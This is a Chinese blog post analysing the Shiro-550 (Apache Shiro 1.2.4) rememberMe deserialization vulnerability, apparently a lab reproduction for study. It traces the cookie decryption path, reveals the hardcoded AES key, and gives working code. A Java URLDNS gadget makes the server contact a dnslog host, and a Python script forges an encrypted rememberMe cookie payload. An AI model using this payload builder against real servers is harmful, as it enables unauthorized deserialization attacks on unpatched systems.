shiro-550反序列化漏洞

已于 2022-06-04 09:11:03 修改
阅读量947 收藏 6
点赞数 2
分类专栏: Java安全 文章标签: web安全
于 2022-04-24 21:59:01 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45677784/article/details/124392972
版权

前言:

shiro反序列化原因是shiro的一个机制为了让浏览器或服务器重启后不丢失用户的登陆状态,会将用户信息保存到 rememberMe字段中 然后发送到服务端,服务端再对它进行base64解密,aes解密,再进行反序列化,由于在 1.2.4 这个版本里 shiro的key是固定的,所以可以通过构造一段恶意类经过aes加密再base64加密然后放到 rememberMe 伪造cookie信息,来让服务端加载,进而触发反序列化漏洞

环境搭建:

部署一个shiro-1.2.4项目启动即可

漏洞分析

首先勾选Remember Me进行抓包,可以看到cookie 里有一段 rememberMe(是经过aes加密和base64加密过的一段字符串

代码具体实现

先定位到CookieRememberMeManager 因为从注释里大概可以知道这是用来处理cookie的一个类

src/main/java/org/apache/shiro/web/mgt/CookieRememberMeManager.java

从函数列表里可以看到有两个函数,看名字可以知道一个可以用来序列化,一个可以用来反序列化

先从反序列化分析,进入到getRememberedSerializedIdentity,可以看到接收一个字符串对象,然后对它进行强转

继续向下看获取request和response里的cookie,然后进行base64解码,因为刚刚抓的包里面RememberMe字段里的值又不太像base64,自然还有一层aes加密,继续跟进查看哪里调用了这个函数

Find一下可以看到getRememberedPrincipals 调用了getRememberedSerializedIdentity

跟进去可以看到有一个convertBytesToPrincipals对getRememberedSerializedIdentity返回的值进行一个操作

接着跟进去,可以看到这个函数做了两步操作,一个解密,一个反序列化

跟进反序列化函数

接着跟进

可以看到调用了原生的反序列化接口

接下来只需要找到aes密钥那我们就可以自己构造参数了,回到刚刚的convertBytesToPrincipals函数跟进到decrypt

可以看到先将getCipherService实例化为cipherService再去调decrypt进行解密

跟进decrypt

从注释里可以看到,他是通过密钥来进行解密的

回到decrypt可以看到密钥是通过函数获取的

跟进去看到调用了一个常量decryptionCipherKey

继续跟进

接下来找一下写它的地方

跟进去可以看到是用来设置密钥的函数,接着找哪里调用了它

可以看到是用来设置加密解密的函数,继续找

可以看到AbstractRememberMeManager函数里的setCipherKey是一个常量,跟进去

可以看到密钥是一段固定的值

那么现在有了密钥我们就可以自己构造数据包,就是序列化aes加密base64加密,然后把它放到正常的执行流程里就可以利用了,这里是有一个坑的,maven在运行的时候只会把compile和runtime的包打进去,通过插件可以看到shiro原生能利用的只有cb

漏洞验证

URLDNS验证

先利用jdk自己的链验证一下漏洞

package example;

import java.io.FileOutputStream;
import java.io.IOException;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.net.URL;
import java.util.HashMap;

public class URLDNS {
    public static void main(String[] args) throws Exception {
        HashMap<URL,Integer> hashmap = new HashMap<>();
        URL url = new URL("http://amr6r7.dnslog.cn");

        Class c = url.getClass();
        Field hashCodeField = c.getDeclaredField("hashCode");
        hashCodeField.setAccessible(true);
        hashCodeField.set(url,1234);
        hashmap.put(url,1);

        hashCodeField.set(url,-1);
        serialize(hashmap);
    }

    private static void serialize(Object obj) throws IOException {
        ObjectOutputStream oss = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        oss.writeObject(obj);

    }
}

生成的ser.bin放到py目录下

再利用脚本将序列化的对象aes和base64加密一下

import uuid
import base64
import sys
from random import Random
from Crypto.Cipher import AES

def get_file_data(filename):
    with open(filename, 'rb') as f:
        data = f.read()
    return data

def aes_enc(data):
    BS = AES.block_size
    pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode()
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = uuid.uuid4().bytes
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    ciphertext = base64.b64encode(iv + encryptor.encrypt(pad(data)))
    return ciphertext

def aes_dec(enc_data):
    enc_data = base64.b64decode(enc_data)
    unpad = lambda s : s[:-s[-1]]
    key = "kPH+bIxk5D2deZiIxcaaaA=="
    mode = AES.MODE_CBC
    iv = enc_data[:16]
    encryptor = AES.new(base64.b64decode(key), mode, iv)
    plaintext = encryptor.decrypt(enc_data[16:])
    plaintext = unpad(plaintext)
    return plaintext

if __name__ == '__main__':
    data = get_file_data("ser.bin")
    print(aes_enc(data))

替换到rememberMe字段里

这里默认有一个JSESSIONID,也就是说如果有JSESSIONID默认就不会去读rememberMe,正常发送payload需要删掉这个JSESSIONID

发送payload,ide下断点

可以看到先是进行了base64解码

之后进行aes解密

然后就走到了readObject

之后进入hashmap

调用了readObject请求dnslog

再来看下dns这边,收到记录

1ighttack
关注
  • 2
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen
11-05
shiro 反序列化漏洞综合利用工具 shiro_attack_by J1anfen,里面的 jar 直接运行即可,用于 shiro 漏洞检测、修复验证等
Shiro CookieRememberMeManager Invalid AES key length
蕃薯耀的博客
04-16 1809
================================ ©Copyright 蕃薯耀 2022-04-16 蕃薯耀的博客_CSDN博客 一、问题描述 CookieRememberMeManager使用加密setCipherKey报错: Caused by: java.security.InvalidKeyException: Invalid AES key length: 10 bytes at com.sun.crypto.provider.AESCipher.engineG.
Shiro反序列化漏洞Shiro-550反序列化漏洞复现
最新发布
人若无名,便可专心练剑
03-14 1032
Shiro-550反序列化漏洞大约在2016年就被披露了,但感觉直到近一两年,在各种攻防演练中这个漏洞才真正走进了大家的视野,Shiro-550反序列化应该可以算是这一两年最好用的RCE漏洞之一,原因有很多:Shiro框架使用广泛,漏洞影响范围广;攻击payload经过AES加密,很多安全防护设备无法识别/拦截攻击……
springboot + shiro 实现记住我
快乐的小三菊的博客
05-21 1599
第一次登录的时候,需要用户自己输入用户名和密码,选中记住的标签。登录成功之后,此时关掉浏览器,再打开浏览器,再次输入刚才的网址,即可发现这次登录不需要再输入用户名和密码,即可直接进入验证通过的界面。达到的最终效果就是第一次使用账号和密码登录(登录成功),此时退出浏览器,然后重新打开网页登录界面,就会自动登录到登录成功的网页上。我们平常在登录网站的时候,经常会发现网页上有个。是如何实现,说白了就是携带参数,将请求发送到。此时,启动工程,输入网址。类是如何实现,需要注意的是。,看下浏览器帮我们保存的。
Spring Boot项目Shiro1.7.1版本默认密钥的漏洞
UDWORLD的博客
09-06 2988
Shiro1.7.1版本默认密钥的漏洞
shiro反序列化漏洞学习(工具+原理+复现)
热门推荐
qq_49849300的博客
03-10 1万+
由于shiro反序列化需要用到AES加密,而该加密方法的密钥是加解密一致的,所以我们使用shiro反序列化时,AES加密的密钥必须跟服务器一致,所以经常需要盲猜服务器的密钥,好在java开发们一般都不会去修改它,而且常常直接copy论坛和github上的代码,所以可以大量收集各种密钥,然后遍历来完成反序列化漏洞利用。反过来,把字节序列(json/xml)恢复为Java对象的过程就叫反序列化。"方法,Base64.decode()中的字符串就是shiro的密钥,要确保该密钥的安全性,千万不要使用公开的密钥。
[Java反序列化]—Shiro反序列化(一)
snowlyzz的博客
12-05 7546
shiro -550 反序列化(一)
Shiro反序列化漏洞检测工具
01-05
Shiro1.2.4及以下版本存在反序列化漏洞,该工具用于测试该漏洞
shiro反序列化漏洞暴力破解漏洞检测工具
09-14
1.shiro反序列化漏洞、暴力破解漏洞检测工具源码 2.shiro反序列化漏洞、暴力破解漏洞检测工具jar包 3.shiro反序列化漏洞、暴力破解漏洞检测工具启动方法 4.shiro反序列化漏洞、暴力破解漏洞检测工具使用方法 5.shiro...
shiro反序列化漏洞利用工具
11-09
图形化界面,该工具支持漏洞检测,请勿用作非法途径,否则后果自负。 Shiro550无需提供rememberMe CookieShiro721需要提供一个有效的rememberMe Cookie 可以手工指定特定的 Key/Gadget/EchoType(支持多选),如果...
Shiro反序列化漏洞Shiro版本升级资源
06-22
从上面我们了解到,反序列化漏洞主要是由于硬编码引起的,那么只要解决硬编码,就解决了该漏洞。解决硬编码主要有两种方式: 方法一:自行实现key值 方法二:升级到1.2.5版本或以上 那么在我的项目中,选择的是升级...
shiro550反序列化漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)
Bossfrank的博客
04-16 9663
本文是shiro550漏洞(CVE-2016-4437)的漏洞原理和漏洞复现。本文所有使用的工具和脚本都会在文末给出链接。使用vulhub搭建靶场,漏洞复现包括手动构造cookie的payload或使用shiro550的图形化漏洞利用工具,最终实现反弹shell和任意命令执行。
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721)
小宇的web博客
02-05 6734
Shiro反序列化漏洞利用详解(Shiro-550+Shiro-721) Shiro简介 Apache Shiro 是一个强大易用的Java安全框架,提供了认证、授权、加密和会话管理等功能,Shiro框架直观、易用、同时也能提供健壮的安全性。 Apache Shiro反序列化漏洞分为两种:Shiro-550Shiro-721 Shiro-550反序列漏洞 漏洞原理 Apache Shiro框架提供了记住密码的功能(RememberMe),用户登录成功后会生成经过加密并编码的cookie。在服务端对reme
Apache Shiro RememberMe 1.2.4 反序列化过程命令执行漏洞【原理扫描】
Gblfy_Blog
12-06 4148
文章目录一、分析定位1. 漏洞描述2. 项目引发漏洞简述二、解决方案2.1. 若依系统2.2. Gus系统 一、分析定位 1. 漏洞描述 目前厂商已经发布了新版本修复这个安全问题,请到厂商的主页下载: https://issues.apache.org/jira/browse/SHIRO-550 https://shiro.apache.org/download.html 2. 项目引发漏洞简述 若依/Guns管理系统使用了Apache ShiroShiro 提供了记住我(RememberM
WARN [org.apache.shiro.mgt.AbstractRememberMeManager]的原因
weixin_44765605的博客
08-09 1836
出现问题的字段: WARN [org.apache.shiro.mgt.AbstractRememberMeManager] - There was a failure while trying to retrieve remembered principals. This could be due to a configuration problem or corrupted principals. This could also be due to a recently changed encryp
apache shiro 反序列化漏洞解决方案
qq_36407469的博客
07-27 5012
一、反序列化漏洞介绍 序列化:把对象转换为字符串或者字节流的过程。 反序列化:把字符串或者字节流恢复为对象的过程。 反序列化漏洞的产生原理,即黑客通过构造恶意的序列化数据,从而控制应用在反序列化过程中需要调用的类方法,最终实现任意方法调用。如果在这些方法中有命令执行的方法,黑客就可以在服务器上执行任意的命令。 二、产生原因 shiro提供了记住我(RememberMe)的功能,即可以在关闭浏览器的情况下,下次打开时还能记住你是谁,无需登录即可访问。 shiro默认使用了CookieRememberMeMa
Shiro报错-[org.apache.shiro.mgt.AbstractRememberMeManager] - There was a failure while trying to retri...
weixin_34261739的博客
04-08 2102
2017-04-08 11:55:33,010 WARN [org.apache.shiro.mgt.AbstractRememberMeManager] - There was a failure while trying to retrieve remembered principals. This could be due to a configuration problem or co...
Apache Shiro 反序列化漏洞Shiro-550 CVE-2016-4437)
渗透测试研究中心
12-03 1394
0x00 漏洞描述Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的Cookie中。攻击者可以使用Shiro的默认密钥伪造用户Cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令只要remem...
云服务器软件运行出错,云服务器程序运行中出现木马
weixin_31884143的博客
07-29 1589
攻击补充01:13:30.597 [http-nio-9070-exec-28] WARN o.a.s.m.AbstractRememberMeManager - [onRememberedPrincipalFailure,449] - There was a failure while trying to retrieve remembered principals. This could ...
shiro-550反序列化漏洞shiro-721反序列化漏洞的区别
04-13
这是一个技术问题,Shiro-550漏洞Shiro-721漏洞都是Apache Shiro框架中的反序列化漏洞,但Shiro-550漏洞主要是由于使用了不安全的Java反序列化进行身份验证,而Shiro-721漏洞主要是由于Shiro的rememberMe功能中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值